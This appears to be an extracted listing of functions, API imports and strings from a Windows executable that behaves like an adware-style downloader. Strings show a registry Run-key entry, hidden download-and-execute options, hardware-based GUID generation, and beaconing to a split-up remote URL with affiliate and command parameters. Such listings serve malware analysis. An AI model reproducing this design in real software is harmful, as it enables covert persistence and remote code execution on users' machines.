sub_outside():
	MSVCRT._CxxThrowException
	KERNEL32.CreateFileA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.CreateFileMappingA
	KERNEL32.MapViewOfFile
	KERNEL32.UnmapViewOfFile
	KERNEL32.CloseHandle
	KERNEL32.ReadFile
	NTDLL.RtlSetLastWin32Error
	MSVCRT.memset
	SHELL32.SHFileOperationA
	KERNEL32.GetCurrentDirectoryA
	KERNEL32.RemoveDirectoryA
	KERNEL32.SetFileAttributesA
	KERNEL32.GetFileAttributesA
	MSVCRT.fopen
	MSVCRT.malloc
	MSVCRT.fread
	MSVCRT.fclose
	MSVCRT.free
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey
	MSVCRT.strlen
	MSVCRT.strncpy
	MSVCRT.strcpy
	MSVCRT.__set_app_type
	MSVCRT.__p__fmode
	MSVCRT.__p__commode
	MSVCRT.__setusermatherr
	MSVCRT._initterm
	MSVCRT.__getmainargs
	KERNEL32.GetStartupInfoA
	KERNEL32.GetModuleHandleA
	MSVCRT.exit
	MSVCRT._XcptFilter
	MSVCRT._exit

sub_40E48B(054d):
	KERNEL32.CloseHandle

sub_407060(0932):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey

sub_411944(09e7):
	MSVCRT.wcslen
	KERNEL32.WideCharToMultiByte
	NTDLL.RtlGetLastWin32Error

sub_40671B(0aef):
	"\\"
	"\\"
	"\\"
	"\\"

sub_405049(0d44):
	KERNEL32.Sleep

sub_404605(0f3d):
	MSVCRT._EH_prolog
	MSVCRT.strlen
	MSVCRT.strcpy
	MSVCRT.strstr
	MSVCRT.strncpy
	MSVCRT.strcat
	KERNEL32.Sleep

sub_4106AB(13d8):
	MSVCRT.strcpy
	MSVCRT.strcat
	KERNEL32.CreateDirectoryA

sub_4057AB(1435):
	MSVCRT._EH_prolog
	KERNEL32.Sleep

	"W"
	"R"
	"i"
	","

sub_402BB1(1645):
	MSVCRT._EH_prolog

sub_402680(1652):
	MSVCRT._mbsnbcpy

sub_408D9F(1b44):
	KERNEL32.lstrcpyA
	KERNEL32.lstrlenA
	USER32.wsprintfA
	MSVCRT.strcpy
	MSVCRT.memset
	MSVCRT._strnicmp

	"old"

sub_40E901(2398):
	MSVCRT.malloc
	MSVCRT.free

sub_4107B2(2439):
	MSVCRT.strcpy
	KERNEL32.CreateFileA
	KERNEL32.WriteFile
	KERNEL32.GetFileType
	KERNEL32.SetFileTime
	KERNEL32.CloseHandle

	"../"
	"..\\"

sub_407551(25ef):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey

sub_40657F(25ef):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey

sub_4118CF(2992):
	KERNEL32.lstrlenA
	KERNEL32.MultiByteToWideChar
	NTDLL.RtlGetLastWin32Error

sub_407913(2c3b):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

sub_40AF6D(2f12):
	MSVCRT.memcpy

	"invalid block type"
	"invalid stored block lengths"
	"too many	length or distance symbols"
	"invalid bit length repeat"

sub_4026DB(338e):
	KERNEL32.CreateFileA
	KERNEL32.WriteFile
	KERNEL32.CloseHandle
	KERNEL32.GlobalFree

sub_4105D7(356f):
	MSVCRT.memset

sub_4093D8(35ce):
	KERNEL32.Sleep

sub_406374(3845):
	"\\"
	"\\"
	"\\"
	"\\"

sub_4024B5(39db):
	MSVCRT.ftell
	MSVCRT.fseek

sub_403488(3b5d):
	MSVCRT._EH_prolog
	MSVCRT.sprintf
	MSVCRT.atol
	MSVCRT.time
	KERNEL32.lstrcpyA
	MSVCRT.atoi
	MSVCRT._strnicmp
	MSVCRT.strcpy
	MSVCRT.strcat

	"ParseXML()\n"
	"%s"
	"configversion"
	"WR\\configversion"
	"paid"
	"WR\\p"
	"nextupdate"
	"WR\\nextupdate"
	"download"
	"%s"
	"rootkey"
	"key"
	"keyvalue"
	"requiredfile"
	"filename"
	"parameters"
	"SaveAs"
	"SavePath"
	"hide"
	"execute"
	"wait"
	"newupdater"
	"version"
	"identifier"
	"crc"
	"windows"
	"%s"

sub_40146A(3c3c):
	MSVCRT._CxxThrowException
	KERNEL32.CreateFileA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.ReadFile
	KERNEL32.CloseHandle

sub_40D9A5(3cf8):
	MSVCRT.calloc

sub_40DAB5(3ea0):
	"1.1.3"

sub_4091F5(4060):
	MSVCRT.time
	KERNEL32.Sleep

sub_4030F7(4085):
	MSVCRT._EH_prolog
	KERNEL32.Sleep
	KERNEL32.lstrcpynA
	MSVCRT.sprintf
	MSVCRT.strcat
	MSVCRT.strcpy

sub_40EA92(459c):
	MSVCRT.malloc

sub_405B91(4766):
	MSVCRT._EH_prolog
	KERNEL32.lstrcpyA
	KERNEL32.lstrlenA
	USER32.wsprintfA
	MSVCRT.strcpy
	MSVCRT.memset
	MSVCRT._strnicmp
	MSVCRT.strlen
	KERNEL32.Sleep

	"affID"

sub_401ACF(48e4):
	MSVCRT.memset
	MSVCRT.sprintf
	KERNEL32.lstrcatA

	"97"
	"97"
	"97"

sub_40592B(4fe3):
	MSVCRT._EH_prolog
	KERNEL32.Sleep
	MSVCRT._mbscmp

	"W"
	"R"
	"cmd"
	"0"

sub_402F1E(52c2):
	KERNEL32.lstrcpyA
	MSVCRT.sprintf
	KERNEL32.lstrcatA
	KERNEL32.Sleep

	"&retry=%d"

sub_404484(5608):
	MSVCRT._EH_prolog

	"download"

sub_40A04E(605a):
	"invalid literal/length code"
	"invalid distance	code"

sub_4027A4(638c):
	KERNEL32.GlobalFree
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcAddress
	KERNEL32.GlobalAlloc
	KERNEL32.GlobalReAlloc
	MSVCRT.memcpy
	KERNEL32.FreeLibrary

	"wininet.dll"
	"InternetOpenUrlA"
	"InternetCloseHandle"
	"InternetReadFile"

sub_404AAE(6792):
	MSVCRT._EH_prolog

sub_4021DB(6c26):
	MSVCRT.memset
	KERNEL32.FindFirstFileA
	KERNEL32.FindNextFileA
	KERNEL32.FindClose

sub_402C48(71df):
	KERNEL32.lstrcpyA
	KERNEL32.lstrcatA
	KERNEL32.Sleep
	MSVCRT.memset
	KERNEL32.WaitForSingleObject

	".bin"
	"InstallZip()\n"
	"crc failed:"
	".old"
	"crc ok,	Install("
	")"
	"OPEN"

sub_40FCA7(741f):
	MSVCRT.free

sub_406909(7482):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

sub_40DC35(74b1):
	"unknown compression method"
	"invalid window size"
	"incorrect header	check"
	"need dictionary"
	"incorrect data check"

sub_402A1E(75ad):
	MSVCRT._EH_prolog
	KERNEL32.GetWindowsDirectoryA
	KERNEL32.GetModuleFileNameA
	KERNEL32.Sleep
	USER32.wsprintfA

	"%d"

sub_404B40(7908):
	MSVCRT._EH_prolog
	KERNEL32.lstrcpyA
	KERNEL32.lstrcatA
	KERNEL32.GetWindowsDirectoryA
	KERNEL32.GetVolumeInformationA
	USER32.wsprintfA
	USER32.CharUpperA
	KERNEL32.Sleep
	KERNEL32.GetSystemDefaultLCID
	KERNEL32.lstrlenA
	KERNEL32.GetLocaleInfoA

	"%04X"
	"{"
	"%08X"
	"HARDWARE\\DESCRIPTION\\System\\CentralProc"...
	"%04X"
	"-"
	"HARDWARE\\DESCRIPTION\\System\\SystemBiosD"...
	"-0000-00"
	"0A887397A5F240675EEF4D35019B6883A6FA5D6"...
	"000001"
	"}"

sub_404151(792e):
	MSVCRT._EH_prolog

sub_40F30A(7c4d):
	MSVCRT.strlen
	MSVCRT.strcpy

sub_40E4EF(7f88):
	KERNEL32.SetFilePointer

sub_404347(7fd1):
	MSVCRT._EH_prolog

sub_40831F(826b):
	MSVCRT.sprintf
	KERNEL32.lstrcpyA
	KERNEL32.Sleep
	KERNEL32.lstrcatA
	KERNEL32.lstrcpynA
	NTDLL.RtlGetLastWin32Error
	MSVCRT.malloc
	MSVCRT.memset
	MSVCRT.free

	"%d"
	"&x="
	"&i="
	"&p="
	"&cmd="
	"&GUID="
	"&version="
	"htt"
	"p://"
	"wr.mc"
	"boo.co"
	"m/reta"
	"dpu.php?"

sub_40FF4C(858e):
	MSVCRT.memcpy
	MSVCRT.strcpy
	KERNEL32.DosDateTimeToFileTime
	MSVCRT.strcmp

	"UT"

sub_40D9CF(86fe):
	MSVCRT.free

sub_408180(87ee):
	USER32.EqualRect

sub_40543F(8c0e):
	MSVCRT._EH_prolog
	KERNEL32.Sleep
	MSVCRT.time

	"WR"
	"nex"
	"tup"
	"date"

sub_404216(8cac):
	KERNEL32.InterlockedDecrement

sub_402296(8f2d):
	KERNEL32.GetCurrentDirectoryA
	MSVCRT.strlen
	MSVCRT.strcpy
	KERNEL32.SetCurrentDirectoryA

sub_40558C(955b):
	MSVCRT._EH_prolog
	KERNEL32.Sleep

	"WR"
	"p"

sub_402EC9(95e7):
	MSVCRT._EH_prolog

sub_40ECA8(963d):
	MSVCRT.free

sub_402199(968a):
	KERNEL32.CreateDirectoryA

sub_405A64(9860):
	MSVCRT._EH_prolog
	KERNEL32.Sleep

	"W"
	"R"
	"c"
	"md"

sub_405E1F(9c51):
	MSVCRT._EH_prolog
	KERNEL32.Sleep
	MSVCRT._mbscmp
	MSVCRT.atoi

	"\\m"
	"ro"
	"finu"
	".ex"
	"e"
	"mr"
	"of"
	"inu"
	".exe.tmp"
	"defaultvalue"
	"11866787A5F240675EE6610530A652BC94C74E7"...
	"WR"
	"\\version"

sub_411800(9c9a):
	MSVCRT._controlfp

sub_401C92(9f30):
	NTDLL.RtlSetLastWin32Error
	MSVCRT.memset
	KERNEL32.Sleep
	SHELL32.SHFileOperationA

sub_40FE9E(a03c):
	KERNEL32.GetCurrentDirectoryA
	MSVCRT.strcat
	KERNEL32.GetFileType

	"\\"

sub_409770(a21d):
	KERNEL32.InterlockedIncrement

sub_406208(a5b4):
	MSVCRT._EH_prolog
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcAddress
	KERNEL32.Sleep
	KERNEL32.lstrcpyA
	KERNEL32.FreeLibrary

	"shell32.dll"
	"ShellExecuteEx"
	"sei \n"

sub_405543(af01):
	KERNEL32.CreateMutexA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.CloseHandle

sub_405327(b058):
	MSVCRT._EH_prolog
	KERNEL32.Sleep

	"WR"
	"confi"
	"gversion"

sub_405693(b058):
	MSVCRT._EH_prolog
	KERNEL32.Sleep

	"W"
	"R"
	"i"

sub_407400(b267):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

sub_40CE56(b45b):
	"invalid distance	code"
	"invalid literal/length code"

sub_40E53B(b76e):
	KERNEL32.SetFilePointer

sub_40CBFE(ba1a):
	"oversubscribed dynamic bit lengths tree"...
	"incomplete dynamic bit lengths tree"

sub_409E20(bae0):
	MSVCRT.memcpy

sub_40F6B0(beac):
	MSVCRT.malloc
	MSVCRT.free

sub_402435(bf61):
	MSVCRT.strlen
	MSVCRT.toupper

sub_411646(c12a):
	MSVCRT._onexit
	MSVCRT.__dllonexit

sub_409A40(c143):
	KERNEL32.LocalFree

sub_404A2D(c8e0):
	KERNEL32.SetCurrentDirectoryA

sub_406EDD(cb50):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

sub_40FE22(cc4c):
	MSVCRT.gmtime
	KERNEL32.SystemTimeToFileTime

sub_408150(cc75):
	USER32.CopyRect

sub_40239F(d371):
	MSVCRT.strlen
	MSVCRT.toupper

sub_40E8D4(d803):
	MSVCRT.strcmp

sub_4033A7(d83f):
	KERNEL32.lstrcpyA

sub_411A14(dc43):
	MSVCRT._CxxThrowException

sub_40CCA6(dd13):
	"oversubscribed literal/length tree"
	"incomplete literal/length tree"
	"oversubscribed distance tree"
	"incomplete distance tree"
	"empty distance tree with	lengths"

sub_40E610(dd1e):
	KERNEL32.ReadFile
	MSVCRT.memcpy

sub_401D8A(de74):
	NTDLL.RtlSetLastWin32Error
	MSVCRT.memset
	SHELL32.SHFileOperationA

sub_402FAF(e014):
	MSVCRT._EH_prolog
	MSVCRT.sprintf
	MSVCRT.strcat

	"%02X"

sub_405150(e07b):
	MSVCRT._EH_prolog
	KERNEL32.Sleep
	MSVCRT._mbscmp

	"SOFTWARE\\Microso"
	"ft\\Windows\\Curren"
	"tVersion\\R"
	"un\\ru"
	"nner1"
	"defaultvalue"
	" "

sub_4080F0(ebb0):
	MSVCRT._mbscmp

sub_4114A0(ebb0):
	MSVCRT._mbsstr

sub_40E2F9(ec84):
	KERNEL32.GetCurrentProcess
	KERNEL32.DuplicateHandle
	KERNEL32.CreateFileA
	KERNEL32.GetFileType
	KERNEL32.SetFilePointer

sub_407A74(f016):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey

sub_406AB3(f016):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey

sub_401109(f546):
	KERNEL32.GetFileSize
	NTDLL.RtlGetLastWin32Error

sub_407E59(f6ae):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

sub_4064D9(f6ae):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

sub_403287(f880):
	MSVCRT._strdup
	MSVCRT._mbsupr
	MSVCRT.free